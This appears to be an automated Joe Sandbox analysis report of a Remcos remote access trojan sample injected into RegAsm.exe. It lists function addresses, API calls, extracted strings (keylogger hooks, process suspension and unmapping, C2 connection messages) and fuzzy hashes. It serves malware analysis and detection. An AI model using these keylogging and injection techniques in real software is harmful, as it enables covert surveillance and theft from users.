Instruction Fuzzy Hash: 1431DAB4D002089FCF14DFA9D984AEEFBB5AF89314F20802AE814B7350C739A905CF94

Function 004D526C Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

L4, xrefs: 004D5320

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: L4
API String ID: 0-1809878614
Opcode ID: f2c80d98733d9c4802f95b664f0d365e500d46e1a0353902af110492fa7bf089
Instruction ID: f567f628b6aa6d1928a108216d332e383949a171d00c6de13d8f13f8a542fb35
Opcode Fuzzy Hash: f2c80d98733d9c4802f95b664f0d365e500d46e1a0353902af110492fa7bf089
Instruction Fuzzy Hash: E521B535A00A04CFCB208F58C564AABB7B2EB94350F5481ABD8059B311DB79DD45CF99

Function 004D5278 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

L4, xrefs: 004D5320

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: L4
API String ID: 0-1809878614
Opcode ID: 51317318699380540fc1e51ed31ebe0d0e7057b57a23c25146ddd9b3c6e601cd
Instruction ID: 7ac549ee01b6d18be6c74f06c616769774d00e1842cb1e3b470d37017569e683
Opcode Fuzzy Hash: 51317318699380540fc1e51ed31ebe0d0e7057b57a23c25146ddd9b3c6e601cd
Instruction Fuzzy Hash: BD21B334A00704CFCB209F58C564A6BB7B2EB84350F5481A7D8199B301DB79DD44CB9A

Function 004D45AC Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5629220b73a888b9b1acaefd7610323bcc9a70c897ed25a58ba959e681b7427c
Instruction ID: 20557ac40a3fe5e38242f2ddf99159707f45a5477f0887cf884352b82961b6bc
Opcode Fuzzy Hash: 5629220b73a888b9b1acaefd7610323bcc9a70c897ed25a58ba959e681b7427c
Instruction Fuzzy Hash: 1641F674B003108FCB209F649960A7B7BE2AFC6300F5484A7D5059F3A1D739ED42CBA9

Function 0015D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.453555683.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d13bdbd818d8f5e92a7f675ce2cec0935b09be62240e5e0bb58b70c54013423
Instruction ID: 6f1e0b7c957a638424fd908d153a3ce81f1b3053e3da9319b76a5ee31c0fdbcb
Opcode Fuzzy Hash: 0d13bdbd818d8f5e92a7f675ce2cec0935b09be62240e5e0bb58b70c54013423
Instruction Fuzzy Hash: 3401DF71108340EAE7205E25E8C4B66BB98DB81325F28C01AED580E2C2D3799949CBB1

Function 0015D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.453555683.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3f8164a6c8e47d425799ae26e1f162547802073c88ed3682002f6f76c05804
Instruction ID: 0863f00ea5782efed7a27f368af87d316a191e5ec9d7960ef34d19f2e000184d
Opcode Fuzzy Hash: 2e3f8164a6c8e47d425799ae26e1f162547802073c88ed3682002f6f76c05804
Instruction Fuzzy Hash: 68015E6140D3C09FD7228B259C94B52BFA4DF52225F1980DBE9988F2E3D2699848C772

Non-executed Functions

Function 004D00A0 Relevance: 15.4, Strings: 12, Instructions: 419COMMON

Download Yara Rule

Strings

L4#p, xrefs: 004D040E
L4#p, xrefs: 004D0419
L4#p, xrefs: 004D03B0
L4#p, xrefs: 004D01C9
L4#p, xrefs: 004D0160
`84, xrefs: 004D011B
|:4, xrefs: 004D054B
`84, xrefs: 004D0240
`, xrefs: 004D04DD
L4#p, xrefs: 004D01BE
`, xrefs: 004D04EB
`84, xrefs: 004D0189

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`84$`84$`84$`$`$|:4
API String ID: 0-634005026
Opcode ID: 112151399ec0e72d3cc74d2433b3404d5eaa2f4d6bab1d46141cfa262d7581fe
Instruction ID: b83f3f426916214b96260fcdf18fbf6ef2bd4c67619562aaf6410af0b00d92ad
Opcode Fuzzy Hash: 112151399ec0e72d3cc74d2433b3404d5eaa2f4d6bab1d46141cfa262d7581fe
Instruction Fuzzy Hash: 3DE11531B00218AFDF259E64D860BBF77A2AFC1310F148467E9059B3A1CB79DD45CBA6

Function 004D05C8 Relevance: 7.7, Strings: 6, Instructions: 208COMMON

Download Yara Rule

Strings

94, xrefs: 004D0643
L4#p, xrefs: 004D06F1
94, xrefs: 004D06B1
94, xrefs: 004D0768
L4#p, xrefs: 004D06E6
L4#p, xrefs: 004D0688

Memory Dump Source

Source File: 00000009.00000002.453694390.00000000004D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4d0000_powershell.jbxd

Similarity

API ID:
String ID: L4#p$L4#p$L4#p$94$94$94
API String ID: 0-1701236533
Opcode ID: e6bf1bc1ba4abcfbde68315d0177c9a10ab276834c147f0fab55ae18e264dd6e
Instruction ID: f306894a91e5d73b97dcd6a4c1babaa3230089d76cbaaa929e4942e59c852a2e
Opcode Fuzzy Hash: e6bf1bc1ba4abcfbde68315d0177c9a10ab276834c147f0fab55ae18e264dd6e
Instruction Fuzzy Hash: A26124347002589FDB159E64D8207BF7BA2AFC1300F148067E9059F392DB78ED55CBA6

Analysis Process: RegAsm.exePID: 3332, Parent PID: 3196COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	1664
Total number of Limit Nodes:	65

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C

Strings

GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
GetFinalPathNameByHandleW, xrefs: 0041CCF5
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
Shell32, xrefs: 0041CC04
GetComputerNameExW, xrefs: 0041CBEB
GetExtendedUdpTable, xrefs: 0041CCD1
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
RmRegisterResources, xrefs: 0041CD1E
RmEndSession, xrefs: 0041CD3E
shcore, xrefs: 0041CB95
NtQueryInformationProcess, xrefs: 0041CCE1
RmStartSession, xrefs: 0041CD09
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
SetProcessDEPPolicy, xrefs: 0041CC13
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
RmGetList, xrefs: 0041CD2E
NtSuspendProcess, xrefs: 0041CC9C
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
GetSystemTimes, xrefs: 0041CC63
GetConsoleWindow, xrefs: 0041CC88
NtResumeProcess, xrefs: 0041CCAC
GlobalMemoryStatusEx, xrefs: 0041CBC8
EnumDisplayDevicesW, xrefs: 0041CC27
Kernel32, xrefs: 0041CB80
IsWow64Process, xrefs: 0041CBD7
NtUnmapViewOfSection, xrefs: 0041CBB8
GetMonitorInfoW, xrefs: 0041CC4F
Psapi, xrefs: 0041CB60
GetExtendedTcpTable, xrefs: 0041CCBC
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
IsUserAnAdmin, xrefs: 0041CBFF
Shlwapi, xrefs: 0041CC79
EnumDisplayMonitors, xrefs: 0041CC3B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32 ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32 ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871
4.9.4 Pro, xrefs: 0040F836, 0040F8A3
override, xrefs: 0040F7CC

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.4 Pro$override$pth_unenc
API String ID: 2281282204-930821335
Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00749E68), ref: 00433849
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00448972

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction Fuzzy Hash:

Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

license_code.txt, xrefs: 0040EA4D
PG, xrefs: 0040F1C7
licence, xrefs: 0040EF88
PG, xrefs: 0040F1F3
PG, xrefs: 0040F036
PG, xrefs: 0040F0D8
User, xrefs: 0040F28E
Access Level: , xrefs: 0040F29F
8SG, xrefs: 0040EE65
PG, xrefs: 0040EEAC
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040E9E6, 0040EE0F
PG, xrefs: 0040ED7B
Exe, xrefs: 0040EB0F
Software\, xrefs: 0040EAC3
SG, xrefs: 0040EB05
PG, xrefs: 0040F187
PSG, xrefs: 0040F224
SG, xrefs: 0040EB62
exepath, xrefs: 0040EE92, 0040EF40
8SG, xrefs: 0040EF1D
Administrator, xrefs: 0040F287
del, xrefs: 0040F2ED, 0040F36F
Remcos Agent initialized, xrefs: 0040EFEF
dMG, xrefs: 0040F1A8
PG, xrefs: 0040F103
PG, xrefs: 0040F12B
del, xrefs: 0040F2D1
PG, xrefs: 0040ED47
PG, xrefs: 0040EDD3
PG, xrefs: 0040EA5D
PG, xrefs: 0040F154
Inj, xrefs: 0040EBD5, 0040EBEC
PG, xrefs: 0040EF66
PG, xrefs: 0040EA96

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-3701325316
Opcode ID: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Function 00414F2A Relevance: 48.1, APIs: 6, Strings: 21, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
Sleep.KERNEL32(00000000,00000002), ref: 00415AD7

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

Connected | , xrefs: 0041524E
PG, xrefs: 00414F54
PG, xrefs: 00415A9E
4.9.4 Pro, xrefs: 004154CB
Connection Error: Unable to create socket, xrefs: 004151EA
TLS On , xrefs: 004150F3
dMG, xrefs: 00415499
name, xrefs: 00415366
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004153C0
NG, xrefs: 004153E2
hlight, xrefs: 00415393
PG, xrefs: 00415328
PSG, xrefs: 004154FE
Connecting | , xrefs: 00415108
| , xrefs: 00415112, 00415253
8SG, xrefs: 00415340
TLS Off, xrefs: 004150E5
NG, xrefs: 00415423
Disconnected, xrefs: 00415A47
%I64u, xrefs: 004152F6
Connection Error: , xrefs: 0041519F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
API String ID: 524882891-108984374
